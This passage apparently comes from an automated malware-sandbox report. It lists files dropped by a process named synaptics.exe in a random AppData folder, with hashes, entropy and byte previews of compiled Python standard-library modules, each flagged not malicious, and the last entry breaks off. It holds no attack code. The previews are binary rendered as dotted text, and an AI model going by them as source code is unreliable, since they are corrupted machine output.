                                                                                                                                                                                                            SHA1:CB54F60A5F32160C3BF8F16512D1FAFEFA80BC6A
                                                                                                                                                                                                            SHA-256:0FB79330E531D42A6DDD528A73B659E59781A5BA0375075131AA3C906BC37FD8
                                                                                                                                                                                                            SHA-512:42D0AD195CC1054D1FC797D973B27B8EB4FEC54CAC3D9D2759150DECDAF57BF6F9985DC60E759A6B4E9116003CC30414BD0B018490D92DCAC68AE895B72F7122
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.+.......................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.e.Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z.d4d5..Z.d6d7..Z.d8d9..Z.d:d;..Z d<d=..Z!d>d?..Z"d@dA..Z#dBdC..Z$dDdE..Z%dFdG..Z&dHdI..Z'dqdJdK..Z(G.dLdM..dM..Z)G.dNdO..dO..Z*G.dPdQ..dQ..Z+dRdS..Z,dTdU..Z-dVdW..Z.dXdY..Z/dZd[..Z0d\d]..Z1d^d_..Z2d`da..Z3dbdc..Z4ddde..Z5dfdg..Z6dhdi..Z7djdk..Z8dldm..Z9z.d.dnl:T.W.n...e;y.......Y.n.w.d.dol:m.Z...e.Z<e.Z=e.Z>e.Z?e.Z@e.ZAe.ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZHe.ZIe.ZJe.ZKe.ZLe.ZMe.ZNe.ZOe.ZPe.ZQe.ZRe.ZSe.ZTe ZUe!ZVe"ZWe$ZXe%ZYe'ZZe,Z[e-Z\e.Z]e/Z^e0Z_e1Z`e2Zae3Zbe4Zce5Zde6Zee7Zfe8Zge9ZhdpS.)ras....Operator Interface..This module exports a set of functions corresponding to the intrinsic.operators of Python. For example, operator.add(x, y) is equivalent.to the expression x+y. The function names are those used for special.methods; variants
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31623
                                                                                                                                                                                                            Entropy (8bit):5.452605491651272
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:3Zz4c1oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:VbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                                            MD5:24F6C9908129A772B47B0511F2FE476D
                                                                                                                                                                                                            SHA1:4CF7B2A36596D8866E956BBCBC91D937DFA99363
                                                                                                                                                                                                            SHA-256:9A20E1FD660C179F9F91E71C391472AC9651D1A6448E57F7AF941E0EF91F4292
                                                                                                                                                                                                            SHA-512:5EE915291A901FC2E1960BE4AC405CF18EB9C0AA4B0EF7DC163557006EF87160987F3D41AE713F5C044EC87B6A79D5D64F56D6EA1F2BB1D20B00577D12915904
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):42076
                                                                                                                                                                                                            Entropy (8bit):5.2374924748883345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:LWHqw6bgaOSKyzD3ZslxWCPnN3v5HgAgRDTMJ68UH73dT0Lwp4oMcce2A6VJSWm+:iKw6bL3MvPnN3v5HgAmDTMK7N8wpjMiS
                                                                                                                                                                                                            MD5:C094BF5A8B7A06AD57E2BDA3AF1DC7CB
                                                                                                                                                                                                            SHA1:B681C2C6AD4E76CE8F693B6E1B1DCD953B36C27B
                                                                                                                                                                                                            SHA-256:002B61BAB887BDD7B98D1831F39F007715576F64F63F30ECD7F4AD8EA8CBD0F5
                                                                                                                                                                                                            SHA-512:90E448DC8C6305177177369C20E0D08B10BC118E6C4F65FFDC622621F278A58D328824D2269A63D7B8BD5161EDC15326D3CE74EAAA7E850C04BFCD6E9594961D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d\........................@...s4...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z d.Z!e.e.e.e.f.Z"e.e e!f.Z#d.d...Z$d.d...Z%G.d.d...d.e&..Z'G.d.d...d.e'..Z(G.d.d...d.e'..Z)e(..Z*e)..Z+G.d.d...d...Z,G.d.d...d.e,..Z-e-..Z.d.d...Z/e0e.d...r.e..1..e/..Z/G.d.d...d...Z2G.d.d...d...Z3G.d d!..d!e2..Z4G.d"d#..d#e2..Z5G.d$d%..d%e2..Z6G.d&d'..d'e...Z7G.d(d)..d)e&..Z8e.j9.:e8....G.d*d+..d+e8..Z;G.d,d-..d-e8..Z<G.d.d/..d/e8..Z=G.d0d1..d1e=e;..Z>G.d2d3..d3e=e<..Z?d.S.)4.....N)...Sequence)...EINVAL..ENOENT..ENOTDIR..EBADF..ELOOP)...attrgetter)...S_ISDIR..S_ISLNK..S_ISREG..S_ISSOCK..S_ISBLK..S_ISCHR..S_ISFIFO)...quote_from_bytes)...PurePath..PurePosixPath..PureWindowsPath..Path..PosixPath..WindowsPath......{...i....c....................C...s ...t.|.d.d...t.v.p.t.|.d.d...t.v.S.).N..errno..winerror)...getattr.._IGNORED_ERROS.._IGNORED_WINERRORS)...except
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):42076
                                                                                                                                                                                                            Entropy (8bit):5.2374924748883345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:LWHqw6pgaOSKyzD3ZslxWCPnN3v5HgAgRDTMJ68UH73dT0Lwp4oMcce2A6VJSWm+:iKw6pL3MvPnN3v5HgAmDTMK7N8wpjMiS
                                                                                                                                                                                                            MD5:555F4ACF5820D6AC37440A723E79D504
                                                                                                                                                                                                            SHA1:8C58A4888EC27D9A9FDC184802A54F71C573174E
                                                                                                                                                                                                            SHA-256:3E4B0DB65F982C8E60B982E2A31C3BDB6346767A86E99AAA773C1B6650822DA2
                                                                                                                                                                                                            SHA-512:AE8DF09F13FCC051ADAFB57539C7E5126048B4BC25BD906A5F2F666216543DFAE575E49D1265FC1D943184B21EAF28744CE44395B4458D20B2640D00F01A6022
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d\........................@...s4...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z d.Z!e.e.e.e.f.Z"e.e e!f.Z#d.d...Z$d.d...Z%G.d.d...d.e&..Z'G.d.d...d.e'..Z(G.d.d...d.e'..Z)e(..Z*e)..Z+G.d.d...d...Z,G.d.d...d.e,..Z-e-..Z.d.d...Z/e0e.d...r.e..1..e/..Z/G.d.d...d...Z2G.d.d...d...Z3G.d d!..d!e2..Z4G.d"d#..d#e2..Z5G.d$d%..d%e2..Z6G.d&d'..d'e...Z7G.d(d)..d)e&..Z8e.j9.:e8....G.d*d+..d+e8..Z;G.d,d-..d-e8..Z<G.d.d/..d/e8..Z=G.d0d1..d1e=e;..Z>G.d2d3..d3e=e<..Z?d.S.)4.....N)...Sequence)...EINVAL..ENOENT..ENOTDIR..EBADF..ELOOP)...attrgetter)...S_ISDIR..S_ISLNK..S_ISREG..S_ISSOCK..S_ISBLK..S_ISCHR..S_ISFIFO)...quote_from_bytes)...PurePath..PurePosixPath..PureWindowsPath..Path..PosixPath..WindowsPath......{...i....c....................C...s ...t.|.d.d...t.v.p.t.|.d.d...t.v.S.).N..errno..winerror)...getattr.._IGNORED_ERROS.._IGNORED_WINERRORS)...except
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):46906
                                                                                                                                                                                                            Entropy (8bit):5.389985066294267
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:/TDMLHxkafcMRD5gCaBMCrr6i8Tf56zENKkOJI/OpdG9SNnvsprxEkn/BVTiIS4n:/TDoxVfcMJaBMCrr6iUmTJIoNnvsprxR
                                                                                                                                                                                                            MD5:6F4DD985ECA290EE51AEBA8431A8833E
                                                                                                                                                                                                            SHA1:D12E9C314F71BBFE04994316CA7CEA30D63677D3
                                                                                                                                                                                                            SHA-256:27C2168B9381404C17D2FD5590A0D610539211CC7332849685F8F9F6C1F6C855
                                                                                                                                                                                                            SHA-512:A329A709B70474DA1CD73BF547B46F9EEB96E93917D2587D54E06ABCEB791A591EFF09397AC71CEF5CE661655D5012208B8DD567884E0864854EE8B26AC26FC3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sN...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.z.d.d.l.m.Z...e...d.....d.Z.W.n...e.yd......d.Z.Y.n.w.e.e.f.Z.d.Z.g.d...Z.d.Z d.Z!G.d.d...d.e"..Z#G.d.d...d.e#..Z$G.d.d...d.e#..Z%G.d.d...d.e"..Z&z.d.d.l'm(Z(..W.n...e.y.......d.Z(Y.n.w.d.Z)d.Z*d.Z+d.Z,d Z-d!Z.d"Z/d#Z0d$Z1d%Z2d&Z3d'Z4d(Z5d)Z6d*Z7d+Z8d,Z9d-Z:d.Z;d/Z<d0Z=d1Z>d2Z?d3Z@d4ZAd5ZBd6ZCd7ZDd8ZEd9ZFd:ZGd;ZHd<ZId=ZJd>ZKd?ZLd@ZMdAZNdBZOdCZPdDZQdEZRdFZSdGZTdHZUdIZVdJZWdKZXdLZYdMZZdNZ[dOZ\dPZ]dQZ^dRZ_eOeYeZe[g.Z`dSZadTZbdUZcdVZddWZedXZfdYZgdZZhd[Zid\Zjd]Zkd^Zld_Zmd`ZndaZoe..pdbdc..eq..D.......G.ddde..de..ZrG.dfdg..dg..Zsdhdi..Ztdjdk..Zudldm..Zvdndo..ZwG.dpdq..dq..ZxG.drds..ds..Zyd.d.d.dt..dudv..Zzd.d.d.dt..dwdx..Z{d.dydzd.d{..d|d}..Z|d.dydzd.d{..d~d...Z}z.d.d.l.m#Z#m$Z$m%Z%m~Z~m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e...y.......exey..Z~Z.eze{e|e}f.\.Z.Z.Z.Z.Y.n.w.d.d...Z.e.d.k...r#d.d.l.Z.e.j.d.d...Z.e.j.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):27453
                                                                                                                                                                                                            Entropy (8bit):5.590842955180001
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:gBuj93Ho+Dvz6WYt08jHUgRyRj4/ISTvI9nI6xk4laOXN4Ww:gBI93oEbq089oRjnuunI6xs64F
                                                                                                                                                                                                            MD5:B1507582152E065775612FE3E6BDBD8C
                                                                                                                                                                                                            SHA1:54BA774E6A14D2E70802747253CD4AD50AA8DCD7
                                                                                                                                                                                                            SHA-256:790D751D6B8B923BCC21FB3D4518D41019E064F4D5A6772CAC4EEB072DBCFD50
                                                                                                                                                                                                            SHA-512:26072AE9A2D11AB191DFFF8BB0C3FD29E397BDC011352958FCE3851802326ED018D804E36D7F5C806AC38ACEFDB6E92C7AD50271B339DFC6E93607617DDC51D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dH........................@...s....d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.d.d.d.d.d.d.d.d.d...Z.e...d...Z.d.d...Z.e...d.e.j...Z.d.d.d...Z.d.d.d...Z.e...d...Z.....d.d.d...Z.d.d.d.d.d.d.d d!d"d#d$d%..Z.d.d&d'd(d)d*d+..Z.d,d-..Z.d.d/..Z.d.d0d1..Z.d2d3..Z.d.d5d6..Z.d7d8..Z.d.d9d:..Z.d;d<..Z.d=d>..Z.d.d?d@..Z.dAdB..Z d.dCdD..Z!dEdFdGd...Z"e.j#d.d.f.dHdI..Z$dJdK..Z%G.dLdM..dM..Z&dNdO..Z'G.dPdQ..dQe..(dRdS....Z)d.a*dTdU..Z+dVdW..Z,dXdY..Z-dZd[..Z.d\d]..Z/d^d_..Z0d`da..Z1e...dbe.j...Z2e...dce.j...Z3e...dd..Z4e...de..Z5i.Z6d.dfdg..Z7dhdi..Z8djdk..Z9dldm..Z:dndo..Z;dpdq..Z<drds..Z=dtdu..Z>i.Z?d.dvdw..Z@e...dx..ZAe...dy..ZBdzZCd.aDd{d|..ZEd}d~..ZFeGd.k...rjd.e.jHv...pPd.e.jHv.ZId.e.jHv...o[d.e.jHv.ZJeKe@eJeI......e..Ld.....d.S.d.S.).a8... This module tries to retrieve as much platform-identifying data as. possible. It makes this information available via function APIs... If called from the command line, it prints the platform. information conca
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10554
                                                                                                                                                                                                            Entropy (8bit):5.330459009759025
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Chb0oiiyslc6Yc5JJ0kMz8g1z37oItrg2spGuDbTM0tNWCEZC:ChGiLlTYc5JJ5Itr5spLbo0bdEZC
                                                                                                                                                                                                            MD5:6E9649441D37AA296FF8099A65088B67
                                                                                                                                                                                                            SHA1:597AA007F7AB219F1481C92F02B4CBE60919B2F2
                                                                                                                                                                                                            SHA-256:6203DB970729A378BAFB3FD7742BEC58B58AFDDD9041426FCC6A6E88EBD74A5E
                                                                                                                                                                                                            SHA-512:794306AC336AF661DEA29ACAD2D28F4B400988659F0839E573C4C089ED579AF71E9F5657E1513C0AAA099641E51ACF7AF20FA5FE3E075526A58D4F23C5CEB8FF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.A.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.a.d.a.d%d&..Z.d'd(..Z.d)d*..Z d+d,..d-d...Z!d/d0..Z"e.j#d1k.Z$d6d2d3..Z%d4d5..Z&d.S.)7a....Common operations on Posix pathnames...Instead of importing this module directly, import os and refer to.this module as os.path. The "os.path" name is an alias for this.module on Posix systems; on other systems (e.g. Windows),.os.path provides the same operations in a manner specific to that.platform, and is an alias to another module (e.g. ntpath)...Some of this can actually be useful on non-Posix systems too, e.g..for manipulation of the pathname component of URLs.........../..:z./bin:/usr/binNz./dev/null.....)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirname..commonprefix..getsize..getmtime..getatime..getctime..islink..exis
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10816
                                                                                                                                                                                                            Entropy (8bit):5.0817922186062265
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Gu+pM4sfRWdufeC/PBbEy6LWf1eR/i9Z6/cWyfmrAX/I8:J+pM3Qdufd/PBbEy6LWdeo9s/PyfmrCP
                                                                                                                                                                                                            MD5:2138F78F6E06C7BF9CEFA664C6E6E9A7
                                                                                                                                                                                                            SHA1:454918C6C27089C099F8A402BE863E5192588FAC
                                                                                                                                                                                                            SHA-256:F57E213A10D869916CB5AA374B9C7874A38211E6D85BF9D25EE1722CA39D019B
                                                                                                                                                                                                            SHA-512:67CC3D4492BDAAC33C40FF14D7C3EFE6D56389FE857EF6BE9627863AF77158F465F19F1F88B9D577BD23E8F5A4703F7B6B90F19BDBA18EE3892870A96ACC6AC1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y1......d.Z.Y.n.w.g.d...Z.z.d.d.l.m.Z...W.n...e.yO......G.d.d...d.e...Z.Y.n.w.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.u.r~e.Z.d.S.d.S.).z'A multi-producer, multi-consumer queue......N)...deque)...heappush..heappop)...monotonic)...SimpleQueue)...Empty..Full..Queue..PriorityQueue..LifoQueuer....).r....c....................@........e.Z.d.Z.d.Z.d.S.).r....z4Exception raised by Queue.get(block=0)/get_nowait().N....__name__..__module__..__qualname__..__doc__..r....r.....4C:\Users\user\AppData\Local\xFSOj9El1Q\lib\queue.pyr...................r....c....................@...r....).r....z4Exception raised by Queue.put(block=0)/put_nowait().Nr....r....r....r....r....r........r....r....c....................@...s....e.Z.d.Z.d.Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d"d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5818
                                                                                                                                                                                                            Entropy (8bit):5.456522838915642
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:hPp0xXxswv10EIJ2XWFP0nf5nizGJFNYTBTO7u10IbJJs5WkbtL4FRJpGyd/8tzs:tqrswv2MGmxMGb+rIWkOFldkS
                                                                                                                                                                                                            MD5:611152F5488B818F49B4CFEA071EBA61
                                                                                                                                                                                                            SHA1:F60D3336F654D59116DD97C4D144CF213C54DFED
                                                                                                                                                                                                            SHA-256:A67AE550AC11BBE8E34A0F0BF1B747BB5619BD2DB02853149CC4C7A1CD3FD4ED
                                                                                                                                                                                                            SHA-512:B7AE1DD73B1C3D61FFEB82FFE9BD7A20E075D10BC480FF8CBF03E4B62AF65004CF2A95EE46C4DED828B5086B056C1805010449667DAF47D13CE36F5E0847C610
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dV........................@...s....d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.z.d.d.l.m.Z.m.Z...W.n...e.y%......d.Z.d.Z.Y.n.w.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rWe.....d.S.d.S.).zHConversions to/from quoted-printable transport encoding as per RFC 1521.)...encode..decode..encodestring..decodestring.....=.L...s....0123456789ABCDEF..........)...a2b_qp..b2a_qpNc....................C...sH...t.|.t...s.J...|.d.v.r.|.S.|.d.k.r.|.S.|.t.k.p#d.|.....k.o d.k.n.......S.).z.Decide whether a particular byte ordinal needs to be quoted... The 'quotetabs' flag indicates whether embedded tabs and spaces should be. quoted. Note that line-ending tabs and spaces are always encoded, as per. RFC 1521.. ..... ......_..... .....~)...isinstance..bytes..ESCAPE)...c..quotetabs..header..r.....5C:\Users\user\AppData\Local\xFSOj9El1Q\lib\quopri.py..needsquoting....s..............".r....c....................C...sB...t.|.t...r.t.|...d.k.s.J...t.|...}.t.t.t.|
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22772
                                                                                                                                                                                                            Entropy (8bit):5.438081014311851
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:b151Eqqa1srwKCiPSFSU2hf9xjTW8tCX21XiF+2YSNJWQhkYM+CS:bzJKZCiRTLCX2B1UJWbYVCS
                                                                                                                                                                                                            MD5:51A4D4B899EAAD056F7BBB2FDBB3B359
                                                                                                                                                                                                            SHA1:0AFDF75128C2166EC1134AA4E3A05410079CC066
                                                                                                                                                                                                            SHA-256:3924BABB88176CE9B98BD8593C4AD0B75095D5D3EB700F20F28F77335FEE70F3
                                                                                                                                                                                                            SHA-512:2D73AFAA991B9FD523BA1ACD78FB9C6C46A311FC6348ABD84AB9E4509CEB20EA21C10B29788F025193AB938AF6DFC27CA644A1B5766D20FB0321850AB88A44AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,dg........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z"m#Z$..d.d.l%m&Z'..d.d.l(m)Z*m+Z,..d.d.l-m-Z...d.d.l.Z/d.d.l0Z0z.d.d.l1m2Z1..W.n...e3ym......d.d.l4m2Z1..Y.n.w.g.d...Z5d.e.d.....e.d.....Z6e.d...Z7d.e.d.....Z8d.Z9d.e9....Z:d.Z;G.d.d...d.e0j<..Z<G.d.d...d.e<..Z=e<..Z>e>j?Z?e>j@Z@e>jAZAe>jBZBe>jCZCe>jDZDe>jEZEe>jFZFe>jGZGe>jHZHe>jIZIe>jJZJe>jKZKe>jLZLe>jMZMe>jNZNe>jOZOe>jPZPe>jQZQe>jRZRe>jSZSe>jTZTe>jUZUd.d...ZVd#d.d...ZWeXe/d ..r.e/jYe>j?d!....eZd"k...r.eW....d.S.d.S.)$a....Random variable generators... bytes. -----. uniform bytes (values between 0 and 255).. integers. --------. uniform within range.. sequences. ---------. pick random element. pick random sample. pick weighted random sample. generate random permutation.. distributions on the real line:. ------------------------------. unifor
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14251
                                                                                                                                                                                                            Entropy (8bit):5.2130219235974415
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:puPJsiNrHyo42OkRFvMKUryx95qoxSEMbZ:pCJssrSo/fRAry/5qoUEMbZ
                                                                                                                                                                                                            MD5:C54DAC56169F8B8249DE513773AC7DE8
                                                                                                                                                                                                            SHA1:C75D7985CE11205457178BFFE9717A744BCEDF4D
                                                                                                                                                                                                            SHA-256:7564F8C8FABD68D9483A5C8F160775A1DC098EC250638723A14A191912355F32
                                                                                                                                                                                                            SHA-512:EFE813828AAF01A9C849AAC629A644BFC3AF545915933233D65B78A4CFEDC15F2D4BBB0BEC1DF369B7DF010BCDD53A84114470058BF8C8A8BEB2D1C176B5C4EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,ds?.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y#......d.Z.Y.n.w.g.d...Z.d.Z.G.d.d...d.e.j...Z.e.....e.j.....e.j.Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d1d.d...Z.d1d.d...Z.d1d.d...Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d.d...Z.d0d.d...Z.d.d...d.D...Z.d d!..Z.e.e...d"d.....Z.e.e...d"d.....d"....Z.i.Z.d#Z d$d%..Z!e.."e ..d&d'....Z#d(d)..Z$d*d+..Z%d.d.l&Z&d,d-..Z'e&.(e.e'e!....G.d.d/..d/..Z)d.S.)2a....Support for regular expressions (RE)...This module provides regular expression matching operations similar to.those found in Perl. It supports both 8-bit and Unicode strings; both.the pattern and the strings being processed can contain null bytes and.characters outside the US ASCII range...Regular expressions can contain both special and ordinary characters..Most ordinary characters, like "A", "a", or "0", are the simplest.regular expressions; they simply match themselves. You can.concatenate ordinary characters, so last matches the string 'last'...Th
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5274
                                                                                                                                                                                                            Entropy (8bit):5.041464402763656
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ednTWdWdlUgN2VsfA2IywpvIyRbepiRtHv+gm0AUY:iTDk52elRKMjmZB
                                                                                                                                                                                                            MD5:FD3C77D436922AE428662409F86B620F
                                                                                                                                                                                                            SHA1:9779CCB0AF5449C374C203211D46D9B87667AD20
                                                                                                                                                                                                            SHA-256:A222870D88667508CB7924C170571DC2E54B1AF5152233B7C469C03417D6C218
                                                                                                                                                                                                            SHA-512:2A3148B597AF64D575A78C538D2452707EDE31639E1AA3DFA9840C35CB154D5F0D35E62BCC45536DF3EF1E598004DC9F9D36B347227ED440E4DE2AAD37A88893
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d4........................@...s\...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.d...Z.G.d.d...d...Z.d.d...Z.e...Z.e.j.Z.d.S.).zGRedo the builtin repr() (representation) but with limits on most sizes.)...Repr..repr..recursive_repr.....N)...islice)...get_ident.....c........................s......f.d.d...}.|.S.).zGDecorator to make a repr function return fillvalue for a recursive callc........................sX...t...........f.d.d...}.t...d...|._.t...d...|._.t...d...|._.t...d...|._.t...d.i...|._.|.S.).Nc........................sJ...t.|...t...f.}.|...v.r...S.....|.....z...|...}.W.....|.....|.S.....|.....w...N)...idr......add..discard)...self..key..result)...fillvalue..repr_running..user_function...6C:\Users\user\AppData\Local\xFSOj9El1Q\lib\reprlib.py..wrapper....s......................z<recursive_repr.<locals>.decorating_function.<locals>.wrapper..__module__..__doc__..__name__..__qualname__..__annotations__)...set..getattrr....r....r....r....r....).r....r......r....).r....r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17129
                                                                                                                                                                                                            Entropy (8bit):5.182512602408802
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:pjj7Dm/9rSzUEok/L1xzQ8DdIE67SQSUQGJbvRkE4wSvBeL:pjj7Dm/9rSzzBdIn7SQSkbvRkE4FvBeL
                                                                                                                                                                                                            MD5:7CC75003CFCFBBA5EA69D6D04B0E4B7F
